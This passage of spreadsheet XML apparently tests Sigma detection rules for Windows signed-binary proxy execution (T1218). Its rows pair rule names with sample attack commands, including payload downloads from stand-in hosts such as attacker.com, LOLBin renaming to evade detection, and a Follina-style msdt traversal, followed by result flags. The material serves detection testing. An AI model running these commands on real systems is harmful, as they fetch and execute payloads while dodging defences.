        <v>0</v>
      </c>
      <c r="H2298" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2298" s="43" t="n"/>
      <c r="J2298" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2298" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2299" ht="15.75" customHeight="1" s="42">
      <c r="A2299" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2299" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_imewbdld_download</t>
        </is>
      </c>
      <c r="C2299" s="43" t="inlineStr">
        <is>
          <t>Arbitrary File Download Via IMEWDBLD.EXE</t>
        </is>
      </c>
      <c r="D2299" s="43" t="inlineStr">
        <is>
          <t>863218bd-c7d0-4c52-80cd-0a96c09f54af</t>
        </is>
      </c>
      <c r="E2299" s="43" t="inlineStr">
        <is>
          <t>imewdbld.exe ftattacker.com/payload.exe</t>
        </is>
      </c>
      <c r="F2299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2299" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2299" s="43" t="n"/>
      <c r="J2299" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2299" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2300" ht="15.75" customHeight="1" s="42">
      <c r="A2300" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2300" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C2300" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D2300" s="43" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E2300" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe  "C:\path\to\malicious.inf"</t>
        </is>
      </c>
      <c r="F2300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2300" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2300" s="43" t="n"/>
      <c r="J2300" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2300" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2301" ht="15.75" customHeight="1" s="42">
      <c r="A2301" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2301" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C2301" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D2301" s="43" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E2301" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe C:\path\to\malicious.INF</t>
        </is>
      </c>
      <c r="F2301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2301" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2301" s="43" t="n"/>
      <c r="J2301" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2301" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2302" ht="15.75" customHeight="1" s="42">
      <c r="A2302" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2302" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C2302" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D2302" s="43" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E2302" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe C:\path\to\malicious.inf.txt</t>
        </is>
      </c>
      <c r="F2302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2302" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2302" s="43" t="n"/>
      <c r="J2302" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2302" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2303" ht="15.75" customHeight="1" s="42">
      <c r="A2303" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2303" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_infdefaultinstall_execute_sct_scripts</t>
        </is>
      </c>
      <c r="C2303" s="43" t="inlineStr">
        <is>
          <t>InfDefaultInstall.exe .inf Execution</t>
        </is>
      </c>
      <c r="D2303" s="43" t="inlineStr">
        <is>
          <t>ce7cf472-6fcc-490a-9481-3786840b5d9b</t>
        </is>
      </c>
      <c r="E2303" s="43" t="inlineStr">
        <is>
          <t>copy InfDefaultInstall.exe not_suspicious.exe &amp;&amp; not_suspicious.exe C:\path\to\malicious.inf</t>
        </is>
      </c>
      <c r="F2303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2303" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2303" s="43" t="n"/>
      <c r="J2303" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2303" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2304" ht="15.75" customHeight="1" s="42">
      <c r="A2304" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2304" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C2304" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D2304" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E2304" s="43" t="inlineStr">
        <is>
          <t>ldifde.exe -i -f http://example.com/payload.ldf</t>
        </is>
      </c>
      <c r="F2304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2304" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2304" s="43" t="n"/>
      <c r="J2304" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2304" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2305" ht="15.75" customHeight="1" s="42">
      <c r="A2305" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2305" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C2305" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D2305" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E2305" s="43" t="inlineStr">
        <is>
          <t>ldifde.exe /i /f C:\path\to\file.ldf</t>
        </is>
      </c>
      <c r="F2305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2305" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2305" s="43" t="n"/>
      <c r="J2305" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2305" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2306" ht="15.75" customHeight="1" s="42">
      <c r="A2306" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2306" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C2306" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D2306" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E2306" s="43" t="inlineStr">
        <is>
          <t>copy ldifde.exe not_suspicious.exe &amp;&amp; not_suspicious.exe /i /f http://attacker.com/payload.ldf</t>
        </is>
      </c>
      <c r="F2306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2306" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2306" s="43" t="n"/>
      <c r="J2306" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2306" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2307" ht="15.75" customHeight="1" s="42">
      <c r="A2307" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2307" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C2307" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D2307" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E2307" s="43" t="inlineStr">
        <is>
          <t>ldifde.exe -i -f "http://attacker.com/payload.ldf" -u</t>
        </is>
      </c>
      <c r="F2307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2307" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2307" s="43" t="n"/>
      <c r="J2307" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2307" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2308" ht="15.75" customHeight="1" s="42">
      <c r="A2308" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2308" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_ldifde_file_load</t>
        </is>
      </c>
      <c r="C2308" s="43" t="inlineStr">
        <is>
          <t>Import LDAP Data Interchange Format File Via Ldifde.EXE</t>
        </is>
      </c>
      <c r="D2308" s="43" t="inlineStr">
        <is>
          <t>6f535e01-ca1f-40be-ab8d-45b19c0c8b7f</t>
        </is>
      </c>
      <c r="E2308" s="43" t="inlineStr">
        <is>
          <t>ldifde.exe /i /f http://attacker.com/payload.ldf</t>
        </is>
      </c>
      <c r="F2308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2308" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2308" s="43" t="n"/>
      <c r="J2308" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2308" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2309" ht="15.75" customHeight="1" s="42">
      <c r="A2309" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2309" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_link_uncommon_parent_process</t>
        </is>
      </c>
      <c r="C2309" s="43" t="inlineStr">
        <is>
          <t>Uncommon Link.EXE Parent Process</t>
        </is>
      </c>
      <c r="D2309" s="43" t="inlineStr">
        <is>
          <t>6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6</t>
        </is>
      </c>
      <c r="E2309" s="43" t="inlineStr">
        <is>
          <t>copy cmd.exe link.exe &amp;&amp; dumpbin.exe /EXPORTS kernel32.dll</t>
        </is>
      </c>
      <c r="F2309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2309" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2309" s="43" t="n"/>
      <c r="J2309" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2309" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2310" ht="15.75" customHeight="1" s="42">
      <c r="A2310" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2310" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_link_uncommon_parent_process</t>
        </is>
      </c>
      <c r="C2310" s="43" t="inlineStr">
        <is>
          <t>Uncommon Link.EXE Parent Process</t>
        </is>
      </c>
      <c r="D2310" s="43" t="inlineStr">
        <is>
          <t>6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6</t>
        </is>
      </c>
      <c r="E2310" s="43" t="inlineStr">
        <is>
          <t>copy cmd.exe link.exe &amp;&amp; "dumpbin.exe" /EXPORTS kernel32.dll</t>
        </is>
      </c>
      <c r="F2310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2310" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2310" s="43" t="n"/>
      <c r="J2310" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2310" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2311" ht="15.75" customHeight="1" s="42">
      <c r="A2311" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2311" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C2311" s="43" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2311" s="43" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E2311" s="43" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchForDeploy calc.exe</t>
        </is>
      </c>
      <c r="F2311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2311" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2311" s="43" t="n"/>
      <c r="J2311" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2311" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2312" ht="15.75" customHeight="1" s="42">
      <c r="A2312" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2312" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C2312" s="43" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2312" s="43" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E2312" s="43" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchForDeploy `calc.exe`</t>
        </is>
      </c>
      <c r="F2312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2312" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2312" s="43" t="n"/>
      <c r="J2312" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2312" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2313" ht="15.75" customHeight="1" s="42">
      <c r="A2313" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2313" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C2313" s="43" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2313" s="43" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E2313" s="43" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchForDeploy .\calc.exe</t>
        </is>
      </c>
      <c r="F2313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2313" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2313" s="43" t="n"/>
      <c r="J2313" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2313" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2314" ht="15.75" customHeight="1" s="42">
      <c r="A2314" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2314" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C2314" s="43" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2314" s="43" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E2314" s="43" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchForDeploy calc.exe # comment</t>
        </is>
      </c>
      <c r="F2314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2314" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2314" s="43" t="n"/>
      <c r="J2314" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2314" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2315" ht="15.75" customHeight="1" s="42">
      <c r="A2315" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2315" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C2315" s="43" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2315" s="43" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E2315" s="43" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchForDeploy calc.exe #</t>
        </is>
      </c>
      <c r="F2315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2315" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2315" s="43" t="n"/>
      <c r="J2315" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2315" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2316" ht="15.75" customHeight="1" s="42">
      <c r="A2316" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2316" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_devtoolslauncher</t>
        </is>
      </c>
      <c r="C2316" s="43" t="inlineStr">
        <is>
          <t>Devtoolslauncher.exe Executes Specified Binary</t>
        </is>
      </c>
      <c r="D2316" s="43" t="inlineStr">
        <is>
          <t>cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6</t>
        </is>
      </c>
      <c r="E2316" s="43" t="inlineStr">
        <is>
          <t>devtoolslauncher.exe LaunchForDeploy calc.exe\</t>
        </is>
      </c>
      <c r="F2316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2316" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2316" s="43" t="n"/>
      <c r="J2316" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2316" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2317" ht="15.75" customHeight="1" s="42">
      <c r="A2317" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2317" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gpscript</t>
        </is>
      </c>
      <c r="C2317" s="43" t="inlineStr">
        <is>
          <t>Gpscript Execution</t>
        </is>
      </c>
      <c r="D2317" s="43" t="inlineStr">
        <is>
          <t>1e59c230-6670-45bf-83b0-98903780607e</t>
        </is>
      </c>
      <c r="E2317" s="43" t="inlineStr">
        <is>
          <t>gpscript.exe /LOGON /startup</t>
        </is>
      </c>
      <c r="F2317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2317" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2317" s="43" t="n"/>
      <c r="J2317" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2317" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2318" ht="15.75" customHeight="1" s="42">
      <c r="A2318" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2318" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_gpscript</t>
        </is>
      </c>
      <c r="C2318" s="43" t="inlineStr">
        <is>
          <t>Gpscript Execution</t>
        </is>
      </c>
      <c r="D2318" s="43" t="inlineStr">
        <is>
          <t>1e59c230-6670-45bf-83b0-98903780607e</t>
        </is>
      </c>
      <c r="E2318" s="43" t="inlineStr">
        <is>
          <t>gpscript.exe /logon</t>
        </is>
      </c>
      <c r="F2318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2318" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2318" s="43" t="n"/>
      <c r="J2318" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2318" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2319" ht="15.75" customHeight="1" s="42">
      <c r="A2319" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2319" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mpiexec</t>
        </is>
      </c>
      <c r="C2319" s="43" t="inlineStr">
        <is>
          <t>MpiExec Lolbin</t>
        </is>
      </c>
      <c r="D2319" s="43" t="inlineStr">
        <is>
          <t>729ce0ea-5d8f-4769-9762-e35de441586d</t>
        </is>
      </c>
      <c r="E2319" s="43" t="inlineStr">
        <is>
          <t>mpiexec.exe -n 1 calc.exe</t>
        </is>
      </c>
      <c r="F2319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2319" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2319" s="43" t="n"/>
      <c r="J2319" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2319" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2320" ht="15.75" customHeight="1" s="42">
      <c r="A2320" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2320" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_pcwrun_follina</t>
        </is>
      </c>
      <c r="C2320" s="43" t="inlineStr">
        <is>
          <t>Execute Pcwrun.EXE To Leverage Follina</t>
        </is>
      </c>
      <c r="D2320" s="43" t="inlineStr">
        <is>
          <t>6004abd0-afa4-4557-ba90-49d172e0a299</t>
        </is>
      </c>
      <c r="E2320" s="43" t="inlineStr">
        <is>
          <t>pcwrun.exe msdt.exe /id PCWDiagnostic /skip true /param "IT_BrowseForFile=..\\..\\..\\Windows\\System32\\calc.exe"</t>
        </is>
      </c>
      <c r="F2320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2320" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2320" s="43" t="n"/>
      <c r="J2320" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2320" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2321" ht="15.75" customHeight="1" s="42">
      <c r="A2321" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2321" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C2321" s="43" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D2321" s="43" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E2321" s="43" t="inlineStr">
        <is>
          <t>copy register_app.vbs legit_script.vbs &amp;&amp; cscript //nologo legit_script.vbs -register YourMalicious.dll</t>
        </is>
      </c>
      <c r="F2321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2321" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2321" s="43" t="n"/>
      <c r="J2321" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2321" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2322" ht="15.75" customHeight="1" s="42">
      <c r="A2322" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2322" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C2322" s="43" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D2322" s="43" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E2322" s="43" t="inlineStr">
        <is>
          <t>copy register_app.vbs legit_script.vbs &amp;&amp; cscript //nologo legit_script.vbs --register YourMalicious.dll</t>
        </is>
      </c>
      <c r="F2322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2322" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2322" s="43" t="n"/>
      <c r="J2322" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2322" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2323" ht="15.75" customHeight="1" s="42">
      <c r="A2323" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2323" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C2323" s="43" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D2323" s="43" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E2323" s="43" t="inlineStr">
        <is>
          <t>copy register_app.vbs legit_script.vbs &amp;&amp; cscript /nologo legit_script.vbs -register YourMalicious.dll</t>
        </is>
      </c>
      <c r="F2323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2323" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2323" s="43" t="n"/>
      <c r="J2323" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2323" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2324" ht="15.75" customHeight="1" s="42">
      <c r="A2324" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2324" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_register_app</t>
        </is>
      </c>
      <c r="C2324" s="43" t="inlineStr">
        <is>
          <t>REGISTER_APP.VBS Proxy Execution</t>
        </is>
      </c>
      <c r="D2324" s="43" t="inlineStr">
        <is>
          <t>1c8774a0-44d4-4db0-91f8-e792359c70bd</t>
        </is>
      </c>
      <c r="E2324" s="43" t="inlineStr">
        <is>
          <t>copy register_app.vbs legit_script.vbs &amp;&amp; cscript //nologo legit_script.vbs -register "YourMalicious.dll"</t>
        </is>
      </c>
      <c r="F2324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2324" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2324" s="43" t="n"/>
      <c r="J2324" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2324" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2325" ht="15.75" customHeight="1" s="42">
      <c r="A2325" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2325" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_scriptrunner</t>
        </is>
      </c>
      <c r="C2325" s="43" t="inlineStr">
        <is>
          <t>Use of Scriptrunner.exe</t>
        </is>
      </c>
      <c r="D2325" s="43" t="inlineStr">
        <is>
          <t>64760eef-87f7-4ed3-93fd-655668ea9420</t>
        </is>
      </c>
      <c r="E2325" s="43" t="inlineStr">
        <is>
          <t>ScriptRunner.exe -appvscript" calc.exe</t>
        </is>
      </c>
      <c r="F2325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G2325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H2325" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2325" s="43" t="n"/>
      <c r="J2325" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K2325" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2326" ht="15.75" customHeight="1" s="42">
      <c r="A2326" s="43" t="inlineStr">
        <is>
          <t>t1218</t>
        </is>
      </c>
      <c r="B2326" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_syncappvpublishingserver_execute_psh</t>
        </is>
      </c>
      <c r="C2326" s="43" t="inlineStr">
        <is>
          <t>SyncAppvPublishingServer Execute Arbitrary PowerShell Code</t>
        </is>
      </c>
      <c r="D2326" s="43" t="inlineStr">
        <is>
          <t>fbd7c32d-db2a-4418-b92c-566eb8911133</t>
        </is>
      </c>
      <c r="E2326" s="43" t="inlineStr">
